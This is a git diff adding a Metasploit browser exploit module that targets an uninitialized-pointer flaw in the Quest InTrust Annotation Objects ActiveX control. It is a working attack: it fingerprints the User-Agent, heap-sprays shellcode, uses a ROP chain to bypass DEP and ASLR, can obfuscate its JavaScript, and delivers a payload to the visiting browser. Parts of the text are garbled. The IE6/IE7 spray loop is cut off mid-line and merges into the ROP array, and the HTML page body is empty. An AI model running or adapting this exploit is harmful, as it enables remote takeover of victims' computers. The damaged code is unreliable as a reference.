diff --git a/modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb b/modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb new file mode 100644 index 0000000000..05cb4f76ba --- /dev/null +++ b/modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb @@ -0,0 +1,266 @@ +## +# $Id$ +## + +### +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super( update_info(info, + 'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution', + 'Description' => %q{ + This module exploits a uninitialized variable vulnerability in the + Annotation Objects ActiveX component. The activeX component loads into memory without + opting into ALSR so this module exploits the vulnerability against windows Vista and + Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX + points to part of the rop chain in a heap chunk and the calculated call will hit the + pivot in a seperate heap chunk. This will take some time in the users browser. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # initial discovery & poc + 'mr_me ', # msf module + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '80662'], + [ 'BID', '52765'], + [ 'URL', 'http://www.exploit-db.com/exploits/18674/'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'InitialAutoRunScript' => 'migrate -f', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + # call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] + # calculation: - 0x44024a50 / 4 = Ret + [ 'Automatic', {} ], + + # Windows XP/Vista/IE6/IE7 target + [ + 'Windows XP/Vista SP0-SP3 (IE6/IE7)', + { + 'Ret' => 0x76767676, + } + ], + + # Windows XP/IE8 target - ASLR/DEP Bypass + [ + 'Windows XP SP0-SP3 DEP bypass (IE8)', + { + 'Ret' => 0x31AAAD78, + } + ], + + # Windows 7/Vista/IE8 target - ASLR/DEP Bypass + [ + 'Windows 7/Vista ALSR/DEP bypass (IE8)', + { + 'Ret' => 0x31AAAD78, + } + ] + ], + 'DisclosureDate' => 'Mar 28 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) + ], self.class) + end + + def junk + return rand_text_alpha(4).unpack("L")[0].to_i + end + + def on_request_uri(cli, request) + #Set target manually or automatically + my_target = target + if my_target.name == 'Automatic' + agent = request.headers['User-Agent'] + if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ # xp/ie6 + my_target = targets[1] + elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/ # xp/ie7 + my_target = targets[1] + elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/ # vista/ie7 + my_target = targets[1] + elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ # xp/ie8 + my_target = targets[2] + elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/ # vista/ie8 + my_target = targets[2] + elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/ # win7/ie8 + my_target = targets[3] + end + end + + print_status("Target selected: #{my_target.name}") if datastore['VERBOSE'] + + # Re-generate the payload. + return if ((p = regenerate_payload(cli)) == nil) + + # shellcode + sc = Rex::Text.to_unescape(p.encoded) + + # Randomize object name + obj_name = rand_text_alpha(rand(100) + 1) + main_sym = 'main' #main function name + + if my_target.name =~ /IE6/ or my_target.name =~ /IE7/ + + js = <<-EOS + function heapspray(){ + shellcode = unescape('#{sc}'); + bigblock = unescape("%u0c0c%u0c0c"); + headersize = 20; + slackspace = headersize+shellcode.length; + while (bigblock.length ebx + 0x44015cc9, # pop edx ; retn + 0x00001000, # 0x00001000-> edx + 0x44017664, # pop ecx ; retn + 0x00000040, # 0x00000040-> ecx + 0x44017bd8, # pop edi ; retn + 0x44017ebe, # retn + 0x4400bf25, # pop eax ; retn + 0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn + 0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c] + 0x90909090, # nops, do not change as it changes the offset + 0x90909090, + 0x90909090, + 0x90909090, + 0x90909090, + 0x90909090, + 0x90909090, + 0x90909090, + 0x90909090, + 0x90909090, + 0x90909090, + 0x90909090 + ].pack('V*') + + rop = Rex::Text.to_unescape(rop_gadgets) + + js = <<-EOF + function heapspray(){ + var payload = unescape('#{rop}'); + payload += unescape('#{sc}'); + var data = payload; + while(data.length < 100000) { data += data; } + var onemeg = data.substr(0, 64*1024/2); + for (i=0; i<14; i++) { + onemeg += data.substr(0, 64*1024/2); + } + onemeg += data.substr(0, (64*1024/2)-(38/2)); + var block = new Array(); + for (i=0; i<700; i++) { + block[i] = onemeg.substr(0, onemeg.length); + } + } + function main(){ + heapspray(); + #{obj_name}.Add(#{my_target.ret},1); + } + EOF + + #JS obfuscation on demand only for IE8 + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + main_sym = js.sym('main') + end + + end + + content = <<-EOF + + + + + + EOF + + print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + + #Remove the extra tabs from content + content = content.gsub(/^\t\t/, '') + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end +end +=begin +eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001 +eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +ANNOTA_1+0xae62: +4400ae62 ff1485504a0244 call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=???????? +=end